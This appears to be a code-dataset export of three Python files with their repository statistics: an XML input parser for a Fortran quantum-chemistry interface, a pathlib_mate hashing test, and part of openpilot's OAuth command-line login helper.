import os
import sys
import xml.etree.ElementTree as ET
import numpy, ast
from .generate_objects import SettingsGenerator
from collections import OrderedDict
class InputProgrammingError(Exception):
pass
class InputXML(object):
tag_type = 'input'
definition_tag = 'input_definition'
def __init__(self, filename = None, \
definition_filename = None,\
input_object = None,\
parent_object = None,\
definition = None, \
directory = None):
if (input_object is not None):
self.root = input_object
elif filename is not None:
if definition_filename is None:
definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml"
if os.path.exists(filename):
self.tree = ET.parse(filename)
self.root = self.tree.getroot()
else:
print("Path for definition file: '{}' does not exist".format(filename))
else:
self.root = None
self.parent_object = parent_object
if directory is not None:
self.directory = directory
elif filename is not None and os.path.exists(filename):
self.directory = os.path.dirname(filename)
elif self.parent_object is not None:
self.directory = self.parent_object.directory
else:
self.directory = None
if definition is not None:
self.definition = definition
elif definition_filename is not None:
if os.path.exists(definition_filename):
definition = ET.parse(definition_filename)
self.definition = definition.getroot()
else:
sys.exit("Input definition filename does not exist: {}".format(definition_filename))
elif self.parent_object is not None:
definition = self.parent_object.definition.find(self.definition_tag)
if definition is not None:
self.definition = definition
else:
sys.exit("Definition tag '{}' not found from parent definition tree", self.definition_tag)
else:
sys.exit("Definition tag input not given.")
self.retrieve()
def prepare(self):
"""
Prepares the input so that it contains everything required to
call the Fortran interface.
"""
self.parse()
self.handle_folders()
self.fill_id_values()
kwargs = OrderedDict()
self.get_interface_argument_values(kwargs)
return kwargs
def form_new_directory_path(self, path_text, original_directory = None):
"""
Creates a new directory path from 'path_text' and 'original_directory' and
validates that it exists. Returns the new path.
"""
if original_directory is not None:
complete_path = os.path.join(original_directory, path_text)
else:
complete_path = path_text
directory_path = os.path.dirname(complete_path)
# check if the path exists
if not os.path.exists(directory_path):
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
return directory_path
def retrieve_path(self, path_text, directory):
"""
Retrieves the content of the xml file at path 'path_text'
(joined with 'directory') and returns its root element.
"""
if directory is not None:
complete_path = os.path.join(directory, path_text)
else:
complete_path = path_text
# check if the path exists
if os.path.exists(complete_path):
tree = ET.parse(complete_path)
return tree.getroot()
else:
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
def retrieve(self):
"""
Retrieves content for the tag from external file(s)
if the tag has an attribute or child named 'path' and/or
'extends_path'.
"""
if self.root is not None:
# check if current tag has an attribute or child with
# name 'path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'path')
# try to retrieve the content from path_text
if path_text is not None and path_text != "":
try:
self.root = self.retrieve_path(path_text, self.directory)
self.directory = self.form_new_directory_path(path_text, self.directory)
except Exception as e:
sys.exit(str(e))
# check if current tag has an attribute or child with
# name 'extends_path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'extends_path')
self.extends_roots = []
self.extends_directories = []
directory = self.directory
while path_text is not None:
# try to retrieve the content from path_text
try:
self.extends_roots.append(self.retrieve_path(path_text, directory))
self.extends_directories.append(self.form_new_directory_path(path_text, directory))
except Exception as e:
sys.exit(str(e))
# prepare for the next loop by getting the next extends path and corresponding directory
directory = self.extends_directories[-1]
path_text = InputXML.read_tag_or_attribute_value(self.extends_roots[-1], 'extends_path')
def fill_id_values(self):
"""
Finds the id for each parameter that is referenced by name
and fills it in at the correct place
"""
for parameter_name in self.parameter_values:
if parameter_name.endswith("_id"):
# if the tag already has a non-zero value, there is
# nothing to look up
if self.get_parameter_value(parameter_name) == 0:
tagtype = parameter_name[:parameter_name.rfind('_')]
name_tag_found = tagtype+"_name" in self.parameter_values
if name_tag_found:
name = self.parameter_values[tagtype+"_name"]
if name is not None and name != "":
id_value = self.get_tagid_for_name(tagtype, name)
if id_value != -1:
self.parameter_values[parameter_name] = id_value
for child in self.children:
child.fill_id_values()
def get_tagid_for_name(self, tagtype, name):
if self.parent_object is not None:
for child in self.parent_object.children:
if hasattr(child, 'tag_type') and child.tag_type == tagtype and hasattr(child, 'name') and child.name == name:
return child.id
return -1
def get_parameter_definition(self, parameter_name):
"""
Retrieve the parameter definition for parameter name
'parameter_name'.
"""
for parameter_definition in self.definition.findall('parameter'):
if parameter_definition.attrib['name'] == parameter_name:
return parameter_definition
return None
def get_definition_tag(self, tag_name):
"""
Retrieve the definition tag for a tag with name = tag_name
"""
definition = self.definition.find('{}'.format(tag_name))
return definition
def _parse_children(self, root, directory):
"""
Parse children of root xml-tag 'root' and store them as
children in the 'self'.
Note: this function is a helper for 'parse'
and should not be used independently.
"""
for tag in root:
if tag.tag not in self.parameter_values:
# try to find the correct definition tag by using the "*_input"-format
definition = self.definition.find('{}_input'.format(tag.tag))
# if the input definition was not found, try to find the definition from
# the '<class>'-tags
if definition is None:
definition_found = False
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] == tag.tag:
definition = definition_tag
definition_found = True
break
if not definition_found:
print("Warning: Found unknown tag with name '{}'. Ignoring.".format(tag.tag))
continue
else:
child = InputXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
else:
if tag.tag == 'settings':
child = SettingsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'structure':
child = StructureXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'basis_set':
child = BasisSetXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'action':
child = ActionXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'scf_energetics':
child = SCFEnergeticsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
self.children.append(child)
self.child_definitions.append(tag.tag)
self.add_counters(child)
child.parse()
def parse(self):
"""
Parse parameters and child xml-tags of the root xml-tags stored
in self.root and self.extends_roots. Stores the found child-xml classes
to 'self.children' and the parameter values to 'self.parameter_values'.
The corresponding definitions are stored to 'self.child_definitions' and
'self.parameter_definitions', respectively.
Note that this function is recursive, as it calls 'parse' for
all found children in '_parse_children'.
"""
self.parameter_values = OrderedDict()
self.parameter_definitions = OrderedDict()
self.children = []
self.child_definitions = []
# handle the parameters first
for parameter_definition in self.definition.findall('parameter'):
if SettingsGenerator.is_valid_parameter(parameter_definition):
self.set_parameter_value(parameter_definition, self.read_parameter_value(parameter_definition))
self.parameter_definitions[parameter_definition.attrib['name']] = parameter_definition
if parameter_definition.attrib['name'] == 'name':
self.name = self.parameter_values['name']
else:
print("PARAMETER is not valid", parameter_definition.attrib['name'])
# if the object has extends_root, then parse the children from it
# and store them to 'self'
if hasattr(self, 'extends_roots') and self.extends_roots is not None\
and hasattr(self, 'extends_directories') and self.extends_directories is not None:
for i, extends_root in enumerate(self.extends_roots):
self._parse_children(extends_root, self.extends_directories[i])
# parse the children from the xml-root of this object and store them
# to 'self'
if self.root is not None:
self._parse_children(self.root, self.directory)
# add the tag classes that are not found in the input file, just to
# input the default values.
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] not in self.child_definitions:
child = InputXML(parent_object = self, definition = definition_tag)
self.children.append(child)
child.parse()
def handle_folders(self):
"""
Creates missing folders and replaces relative paths with
absolute ones
"""
for parameter_name in self.parameter_values:
if parameter_name in ['output_folder', 'input_folder', 'folder_path']:
if self.parameter_values[parameter_name] is not None:
# convert the non absolute paths to absolute ones
if not os.path.isabs(self.parameter_values[parameter_name]):
# join the directory of the file with the input directory
path = os.path.join(self.directory, self.parameter_values[parameter_name])
# make the path more readable by removing extra slashes and dots
self.parameter_values[parameter_name] = os.path.normpath(path)
# if the output folder does not exist, create it
if parameter_name == 'output_folder' and not os.path.exists(self.parameter_values[parameter_name]):
os.makedirs(self.parameter_values[parameter_name])
for child in self.children:
child.handle_folders()
def get_interface_argument_values(self, argument_values, parameter_definitions = None, abbreviation = None, counter_present = False):
"""
This function converts the values of the parameters to a form suitable for the
Fortran interface. The converted values are stored in the input-output dictionary 'argument_values'.
"""
# guard against the shared mutable-default pitfall across repeated calls
if parameter_definitions is None:
parameter_definitions = {}
if 'abbreviation' in self.definition.attrib:
abbreviation = self.definition.attrib['abbreviation']
for parameter_name in self.parameter_values:
if SettingsGenerator.generate_fortran(self.parameter_definitions[parameter_name]):
if abbreviation is not None:
argument_key = "{}_{}".format(abbreviation, parameter_name)
else:
argument_key = parameter_name
if counter_present:
# Check if the parameter value is None. If the value is None, the
# parameter is not present in the input file, and the default
# value of the parameter is not specified.
if self.parameter_values[parameter_name] is not None:
if argument_key in argument_values and argument_values[argument_key] is not None:
argument_values[argument_key].append(self.parameter_values[parameter_name])
else:
argument_values[argument_key] = [self.parameter_values[parameter_name]]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key not in parameter_definitions:
argument_values[argument_key] = None
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key in argument_values:
print("Warning: Found two (or more) arguments for the same parameter: {}".format(argument_key))
else:
argument_values[argument_key] = self.parameter_values[parameter_name]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
for child in self.children:
if 'global_index_counter' in child.definition.attrib or 'local_index_counter' in child.definition.attrib or 'counters' in child.definition.attrib:
counter_present = True
if SettingsGenerator.generate_fortran(child.definition):
child.get_interface_argument_values(argument_values, parameter_definitions, abbreviation = abbreviation, counter_present = counter_present)
# if we are at the root, convert the values with type list to numpy arrays
if self.parent_object is None:
for argument_key in list(argument_values):
# the string lists need some special attention:
if parameter_definitions[argument_key].attrib['type'].startswith('string') and type(argument_values[argument_key]) == list:
temp = numpy.empty((256, len(argument_values[argument_key])+1), dtype="c")
for j, value in enumerate(argument_values[argument_key]):
temp[:, j] = "{0:{width}}".format(argument_values[argument_key][j], width=256)
argument_values[argument_key] = numpy.array(temp, dtype="c").T
elif type(argument_values[argument_key]) == list:
temp_array = numpy.array(argument_values[argument_key], order='F').T
shape = temp_array.shape
if len(shape) == 3:
new_shape = (shape[0], shape[1], shape[2]+1)
elif len(shape) == 2:
new_shape = (shape[0], shape[1]+1)
else:
new_shape = (shape[0]+1)
new_array = numpy.empty(new_shape, order='F')
if len(shape) == 3:
new_array[:, :, :shape[2]] = temp_array[:, :, :]
elif len(shape) == 2:
new_array[:, :shape[1]] = temp_array[:, :]
else:
new_array[:shape[0]] = temp_array[:]
argument_values[argument_key] = new_array
elif argument_values[argument_key] is None:
del argument_values[argument_key]
def add_counters(self, child):
"""
Increments all the counter values associated with the child object 'child' of 'self' by one
"""
if 'global_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['global_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['global_index_counter']))
else:
child.id = self.get_counter_value(child.definition.attrib['global_index_counter'])
if 'local_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['local_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['local_index_counter']))
if 'counters' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['counters'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['counters']))
def add_counter_value(self, counter_name):
"""
Increments the value of the counter parameter with name 'counter_name' by one.
If the counter is not found in the local object, it
is searched from the parent objects.
"""
if counter_name in self.parameter_values:
if self.parameter_values[counter_name] is None:
self.parameter_values[counter_name] = 0
self.parameter_values[counter_name] += 1
return True
else:
if self.parent_object is not None:
return self.parent_object.add_counter_value(counter_name)
else:
return False
def get_counter_value(self, counter_name):
"""
Get the value of a counter with name 'counter_name'.
If the counter is not found in the local object, it
is searched from the parent objects.
"""
if counter_name in self.parameter_values:
return self.parameter_values[counter_name]
else:
if self.parent_object is not None:
return self.parent_object.get_counter_value(counter_name)
else:
return -1
def set_parameter_value(self, parameter_definition, value):
"""
Set an arbitrary value 'value' for the parameter with definition
'parameter_definition'.
"""
# convert the value to right data type and check that it is valid
final_value = self.convert_argument_value(value, parameter_definition)
# check that value is within given limits
self.check_value_range(final_value, parameter_definition)
# set the parameter value
self.parameter_values[parameter_definition.attrib['name']] = final_value
@staticmethod
def read_tag_or_attribute_value(root, name):
"""
Reads the value of a tag or attribute with name 'name' in an xml. If
attribute or tag is not found, None is returned.
"""
value = None
if root is not None:
tag = root.find(name)
if tag is not None:
value = tag.text
elif name in root.attrib:
value = root.attrib[name]
return value
def read_parameter_value(self, parameter_definition):
"""
Read the value of the parameter first from the values of the XML-element,
secondarily from the objects we are extending from and thirdly from
the default value of the parameter definition.
"""
value = InputXML.read_tag_or_attribute_value(self.root, parameter_definition.attrib['name'])
# if value is not found at root, then use the value from extends roots
if value is None and hasattr(self, 'extends_roots') and self.extends_roots is not None:
for extends_root in self.extends_roots:
value = InputXML.read_tag_or_attribute_value(extends_root, parameter_definition.attrib['name'])
# if value is found, break the iteration
if value is not None:
break
# fall back to default value/or None if one is not specified
if value is None:
if 'default' in parameter_definition.attrib:
value = parameter_definition.attrib['default']
return value
def get_parameter_value(self, parameter_name):
"""
Get the value of the parameter from the parsed parameters.
If the parameter is not found an InputProgrammingError
is raised.
"""
if hasattr(self, 'parameter_values') and parameter_name in self.parameter_values:
return self.parameter_values[parameter_name]
else:
raise InputProgrammingError("Accessed parameter: '{}' is not in the values ".format(parameter_name)+ \
"of the object. Have you perfomed 'parse' for the object?")
def parameter_values_are_equal(self, other, parameter_name):
"""
Compare the values of parameter with name 'parameter_name' for
two objects of the same type.
"""
# check that the input objects are of same type
if type(self) != type(other):
raise InputProgrammingError("The objects compared with parameter_values_are_equal"+
" are not of same type.")
# get the values for both input objects
self_value = self.get_parameter_value(parameter_name)
other_value = other.get_parameter_value(parameter_name)
if isinstance(self_value, list) or isinstance(self_value, numpy.ndarray):
if len(self_value) != len(other_value):
return False
for i in range(len(self_value)):
if type(self_value[i]) == float or type(self_value[i]) == numpy.float64 or type(self_value[i]) == numpy.float32 or type(self_value[i]) == numpy.float16:
if abs(self_value[i] - other_value[i]) > 1e-10:
return False
elif self_value[i] != other_value[i]:
return False
return True
else:
return self_value == other_value
def all_parameter_values_are_equal(self, other):
"""
Check if all parameter values of 'self' and 'other'
are equal
"""
for parameter_name in self.parameter_values:
if not self.parameter_values_are_equal(other, parameter_name):
return False
return True
def is_of_same_type_as(self, other):
"""
Check if self is of same type as other
"""
return type(self) == type(other) \
and self.definition.attrib['name'] == other.definition.attrib['name']
def children_are_equal(self, other):
"""
Check if children of 'self' and 'other' are equal with definition
and value
"""
for child in self.children:
equal_found = False
# go through all the children and check if there is equal
for other_child in other.children:
if child == other_child:
equal_found = True
# if not, the children cannot be equal
if not equal_found:
return False
return True
def __eq__(self, other):
"""
Check if two InputXML objects are equal with each other
"""
return self.is_of_same_type_as(other)\
and self.all_parameter_values_are_equal(other)\
and self.children_are_equal(other)
def __ne__(self, other):
return not self.__eq__(other)
def read_array_values(self, value_text, argument_type):
is_number = argument_type.startswith("int") or \
argument_type.startswith("float") or \
argument_type.startswith("double")
# try to evaluate the value text as a dict (e.g. molecular orbital specifications)
try:
dictionary = ast.literal_eval("{"+ value_text +"}")
size = max(dictionary.keys())
# init array of size
if is_number:
result = [0] * size
else:
result = [None] * size
for key in dictionary:
# convert the indexing from the 1-starting to 0-starting
result[key-1] = dictionary[key]
except Exception:  # not a dict literal (or not dict-like); fall back to list parsing
try:
result = ast.literal_eval("["+ value_text +"]")
except Exception:
raise Exception("Bad form of array, should have a list or a dictionary, value is: {}.".format(value_text))
return result
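# Worked example (sketch, not in the original source) of the two accepted forms:
#   read_array_values("1: 0.5, 3: 0.25", "float") -> [0.5, 0, 0.25]  (dict form, 1-based keys)
#   read_array_values("0.5, 0.25", "float")       -> [0.5, 0.25]     (list form)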
def convert_argument_value(self, value_text, parameter_definition):
argument_type = parameter_definition.attrib['type']
if SettingsGenerator.has_options(parameter_definition):
value_text = self.get_option_value(value_text, parameter_definition)
if SettingsGenerator.is_array(parameter_definition):
if value_text is None:
value = None
else:
# do the parsing of the input array (could also be a dictionary), which
# has to be changed to a list
array_values = self.read_array_values(value_text, argument_type)
# get the final size of the result array from the parameter definition
size = int(parameter_definition.attrib['shape'])
value = numpy.zeros(size)
try:
for i, arg in enumerate(array_values):
if argument_type.startswith('int'):
value[i] = int(arg)
if argument_type.startswith('float'):
value[i] = float(arg)
if argument_type.startswith('double'):
value[i] = float(arg)
if argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value[i] = str(arg)
else:
value[i] = str(arg)
if argument_type.startswith('bool'):
if arg.lower() == 'false':
value[i] = False
elif arg.lower() == 'true':
value[i] = True
else:
value[i] = bool(arg)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
else:
try:
if value_text is None:
value = None
elif argument_type.startswith('int'):
value = int(value_text)
elif argument_type.startswith('float'):
value = float(value_text)
elif argument_type.startswith('double'):
value = float(value_text)
elif argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value = str(value_text)
else:
value = str(value_text)
elif argument_type.startswith('bool'):
if value_text.lower() == 'false':
value = False
elif value_text.lower() == 'true':
value = True
else:
value = bool(value_text)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
return value
def check_value_range(self, value, parameter_definition):
if value is not None:
if 'minval' in parameter_definition.attrib:
minval = parameter_definition.attrib['minval']
if value < float(minval):
sys.exit('Error: argument with name {} and value {} is smaller than the smallest allowed value: {}'.format(parameter_definition.attrib['name'], value, float(minval)))
if 'maxval' in parameter_definition.attrib:
maxval = parameter_definition.attrib['maxval']
if value > float(maxval):
sys.exit('Error: argument with name {} and value {} is larger than the largest allowed value: {}'.format(parameter_definition.attrib['name'], value, float(maxval)))
def get_option_value(self, value_text, parameter_definition):
options = parameter_definition.findall('option')
result = None
if len(options) > 0:
valid_options = ""
for option in options:
if 'value' in option.attrib and value_text == option.attrib['value']:
return value_text
elif 'text_value' in option.attrib and value_text == option.attrib['text_value']:
return option.attrib['value']
else:
valid_options += ("{}: {} ".format(option.attrib['value'], option.attrib['text_value']))
sys.exit('Error: The value "{}" for argument with name "{}" is not within allowed options: {} '.format(value_text, parameter_definition.attrib['name'], valid_options))
def get_root_object(self):
if self.parent_object is None:
return self
else:
return self.parent_object.get_root_object()
class SCFEnergeticsXML(InputXML):
tag_type = 'scf_energetics'
definition_tag = 'scf_energetics_input'
class ActionXML(InputXML):
tag_type = 'action'
definition_tag = 'action_input'
def parse(self):
super(ActionXML, self).parse()
self.handle_output_files()
def handle_output_files(self):
"""
Reads in the output files and creates the corresponding
objects to the tree
"""
if 'output_folder' in self.parameter_values:
scf_energetics_filename = \
os.path.join(self.parameter_values['output_folder'], "scf_energetics.xml")
root_object = self.get_root_object()
# if scf energetics file exists, parse it and add as a child of the root
# and set it as the input scf energetics of the action
if os.path.exists(os.path.join(self.directory, scf_energetics_filename)):
scf_energetics_definition = root_object.definition.find('scf_energetics_input')
scf_energetics = SCFEnergeticsXML(parent_object = root_object, \
definition = scf_energetics_definition)
scf_energetics.root = scf_energetics.retrieve_path(scf_energetics_filename, scf_energetics.directory)
root_object.children.append(scf_energetics)
root_object.child_definitions.append('scf_energetics')
root_object.add_counters(scf_energetics)
scf_energetics.parse()
scf_energetics_id_definition = self.get_parameter_definition('scf_energetics_id')
self.set_parameter_value(scf_energetics_id_definition, scf_energetics.id)
structure_filename = \
os.path.join(self.parameter_values['output_folder'], "structure.xml")
# if structure file exists, parse it and add it as a child of the root
# and set it as the input structure of the action
if os.path.exists(os.path.join(self.directory, structure_filename)):
structure_definition = root_object.definition.find('structure_input')
structure = StructureXML(parent_object = root_object, \
definition = structure_definition)
structure.root = structure.retrieve_path(structure_filename, structure.directory)
root_object.children.append(structure)
root_object.child_definitions.append('structure')
root_object.add_counters(structure)
structure.parse()
structure_id_definition = self.get_parameter_definition('structure_id')
self.set_parameter_value(structure_id_definition, structure.id)
class BasisSetXML(InputXML):
tag_type = 'basis_set'
definition_tag = 'basis_set_input'
class SettingsXML(InputXML):
tag_type = 'settings'
definition_tag = 'settings_input'
class StructureXML(InputXML):
tag_type = 'structure'
definition_tag = 'structure_input'
atom_types = {'H':1, 'He':2, 'Li':3, 'Be':4, 'B':5, 'C':6, 'N':7, 'O':8, 'F':9, 'Ne':10, 'Na': 11, 'Mg':12, 'Al':13, 'Si':14, 'P':15, 'S':16, 'Cl':17, 'Ar':18}
def read_input(self):
charge = self.root.find('charge')
# read relative charge
if (charge is not None):
self.charge = int(charge.text)
else:
self.charge = 0
# read coordinates and atom types
self.coordinates = []
self.types = []
self.charges = []
# first read atom coordinates in 'atom' tags
for i, atom in enumerate(self.root.findall('atom')):
self.read_atom_coordinates_and_type(atom)
# then read atoms in 'atoms' tags
for i, atoms in enumerate(self.root.findall('atoms')):
self.read_atoms_coordinates_and_types(atoms)
def read_atom_coordinates_and_type(self, atom):
result = [0.0, 0.0, 0.0]
x = atom.find('x')
if (x is not None):
result[0] = float(x.text)
y = atom.find('y')
if (y is not None):
result[1] = float(y.text)
z = atom.find('z')
if (z is not None):
result[2] = float(z.text)
xyz = atom.find('xyz')
atom_type = self.read_atom_type(atom)
# default charge from the declared type; overridden if an 'xyz' tag provides one
atom_charge = self.get_atom_charge(atom_type)
if (xyz is not None):
xyz_text = xyz.text.strip().split(" ")
if (len(xyz_text) == 4):
atom_type = self.get_atom_type(xyz_text[0])
atom_charge = self.get_atom_charge(xyz_text[0])
result[0] = float(xyz_text[1])
result[1] = float(xyz_text[2])
result[2] = float(xyz_text[3])
else:
sys.exit("Error: Too many or too few coordinates in 'atom'->'xyz' -tag.")
self.coordinates.append(result)
self.types.append(atom_type)
self.charges.append(atom_charge)
def get_atom_type(self, atom_type_text):
return int(self.atom_types[atom_type_text])
def get_atom_charge(self, atom_type_text):
return float(self.atom_types[atom_type_text])
def read_atom_type(self, atom):
if 'type' in atom.attrib:
return atom.attrib['type']
else:
sys.exit("Error: The mandatory attribute 'type' not found in 'atom'-tag")
def read_atoms_coordinates_and_types(self, atoms):
xyz = atoms.find('xyz')
coordinates = []
types = []
charges = []
if (xyz is not None):
xyz_lines = xyz.text.splitlines()
for xyz in xyz_lines:
xyz_text = xyz.strip().split(" ")
xyz_coord = [0.0, 0.0, 0.0]
# ignore empty lines
if (len(xyz_text) == 1 and xyz_text[0] == ""):
continue
elif (len(xyz_text) == 4):
types.append(self.get_atom_type(xyz_text[0]))
charges.append(self.get_atom_charge(xyz_text[0]))
xyz_coord[0] = float(xyz_text[1])
xyz_coord[1] = float(xyz_text[2])
xyz_coord[2] = float(xyz_text[3])
coordinates.append(xyz_coord)
else:
sys.exit("Error: Too many or too few coordinates in 'atoms'->'xyz' -line.")
self.coordinates.extend(coordinates)
self.types.extend(types)
self.charges.extend(charges)
if __name__ == "__main__":
if len(sys.argv) <= 1:
print("Give the input file name as an input.")
else:
inp = InputXML(filename = sys.argv[1], definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml")
import dage_fortran
dage_fortran.python_interface.run(**inp.prepare())
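# --- Usage sketch (not part of the original file) -----------------------------
# Minimal standalone use of InputXML; "molecule.xml" is a placeholder input and
# the definition file is resolved the same way as in the __main__ block above.
def _example_usage():
    definition = os.path.dirname(os.path.realpath(__file__)) + "/input_parameters.xml"
    inp = InputXML(filename="molecule.xml", definition_filename=definition)
    kwargs = inp.prepare()  # parse, resolve folders, fill ids, collect arguments
    return kwargs           # keyword arguments for the Fortran interface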
| 47.020948
| 179
| 0.559487
| 4,646
| 42,648
| 4.959535
| 0.105252
| 0.010416
| 0.014061
| 0.016275
| 0.393803
| 0.285305
| 0.228105
| 0.204149
| 0.169951
| 0.135622
| 0
| 0.004375
| 0.356898
| 42,648
| 906
| 180
| 47.072848
| 0.835746
| 0.170559
| 0
| 0.245347
| 0
| 0
| 0.075603
| 0.001987
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06599
| false
| 0.001692
| 0.011844
| 0.005076
| 0.175973
| 0.013536
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d27a9aec4e8518393324c6681b93cf4f6993a5
| 506
|
py
|
Python
|
tests/test_mate_hashes_methods.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 9
|
2017-09-07T21:21:43.000Z
|
2020-10-11T09:47:24.000Z
|
tests/test_mate_hashes_methods.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2018-10-16T14:30:26.000Z
|
2020-12-05T02:40:46.000Z
|
tests/test_mate_hashes_methods.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2017-09-05T14:06:01.000Z
|
2021-06-29T15:31:13.000Z
|
# -*- coding: utf-8 -*-
import pytest
from pathlib_mate.pathlib2 import Path
class TestHashesMethods(object):
def test(self):
p = Path(__file__)
assert len({
p.md5, p.get_partial_md5(nbytes=1 << 20),
p.sha256, p.get_partial_sha256(nbytes=1 << 20),
p.sha512, p.get_partial_sha512(nbytes=1 << 20),
}) == 3
if __name__ == "__main__":
import os
basename = os.path.basename(__file__)
pytest.main([basename, "-s", "--tb=native"])
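# --- Sketch (not part of the original test) -----------------------------------
# The set above collapses to 3 values because hashing only the first nbytes of
# a file equals the full-file hash whenever the file is shorter than nbytes.
# Stdlib equivalent of the partial-hash idea:
import hashlib

def partial_md5(path, nbytes=1 << 20):
    """Hash at most the first nbytes of a file (illustrative helper)."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        h.update(f.read(nbytes))  # reads min(nbytes, file size) bytes
    return h.hexdigest()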
| 23
| 59
| 0.592885
| 66
| 506
| 4.19697
| 0.560606
| 0.043321
| 0.119134
| 0.072202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 0.254941
| 506
| 21
| 60
| 24.095238
| 0.665782
| 0.041502
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.071429
| false
| 0
| 0.214286
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d2a60bb0dcf9c3c7f564f0707f97c252020d5c
| 4,183
|
py
|
Python
|
tools/lib/auth.py
|
shoes22/openpilot
|
a965de3c96a53b67d106cfa775e3407db82dd0e1
|
[
"MIT"
] | 121
|
2019-03-27T06:34:51.000Z
|
2021-06-15T14:37:29.000Z
|
tools/lib/auth.py
|
shoes22/openpilot
|
a965de3c96a53b67d106cfa775e3407db82dd0e1
|
[
"MIT"
] | 54
|
2019-04-11T08:51:58.000Z
|
2021-06-13T17:04:22.000Z
|
tools/lib/auth.py
|
shoes22/openpilot
|
a965de3c96a53b67d106cfa775e3407db82dd0e1
|
[
"MIT"
] | 139
|
2019-07-16T07:25:05.000Z
|
2021-06-09T11:27:53.000Z
|
#!/usr/bin/env python3
"""
Usage::
usage: auth.py [-h] [{google,apple,github,jwt}] [jwt]
Login to your comma account
positional arguments:
{google,apple,github,jwt}
jwt
optional arguments:
-h, --help show this help message and exit
Examples::
./auth.py # Log in with google account
./auth.py github # Log in with GitHub Account
./auth.py jwt ey......hw # Log in with a JWT from https://jwt.comma.ai, for use in CI
"""
import argparse
import sys
import pprint
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict
from urllib.parse import parse_qs, urlencode
from tools.lib.api import APIError, CommaApi, UnauthorizedError
from tools.lib.auth_config import set_token, get_token
PORT = 3000
class ClientRedirectServer(HTTPServer):
query_params: Dict[str, Any] = {}
class ClientRedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
if not self.path.startswith('/auth'):
self.send_response(204)
return
query = self.path.split('?', 1)[-1]
query = parse_qs(query, keep_blank_values=True)
self.server.query_params = query
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(b'Return to the CLI to continue')
def log_message(self, format, *args): # pylint: disable=redefined-builtin
pass # this prevents the http server from dumping messages to stdout
def auth_redirect_link(method):
provider_id = {
'google': 'g',
'apple': 'a',
'github': 'h',
}[method]
params = {
'redirect_uri': f"https://api.comma.ai/v2/auth/{provider_id}/redirect/",
'state': f'service,localhost:{PORT}',
}
if method == 'google':
params.update({
'type': 'web_server',
'client_id': '45471411055-ornt4svd2miog6dnopve7qtmh5mnu6id.apps.googleusercontent.com',
'response_type': 'code',
'scope': 'https://www.googleapis.com/auth/userinfo.email',
'prompt': 'select_account',
})
return 'https://accounts.google.com/o/oauth2/auth?' + urlencode(params)
elif method == 'github':
params.update({
'client_id': '28c4ecb54bb7272cb5a4',
'scope': 'read:user',
})
return 'https://github.com/login/oauth/authorize?' + urlencode(params)
elif method == 'apple':
params.update({
'client_id': 'ai.comma.login',
'response_type': 'code',
'response_mode': 'form_post',
'scope': 'name email',
})
return 'https://appleid.apple.com/auth/authorize?' + urlencode(params)
else:
raise NotImplementedError(f"no redirect implemented for method {method}")
def login(method):
oauth_uri = auth_redirect_link(method)
web_server = ClientRedirectServer(('localhost', PORT), ClientRedirectHandler)
print(f'To sign in, use your browser and navigate to {oauth_uri}')
webbrowser.open(oauth_uri, new=2)
while True:
web_server.handle_request()
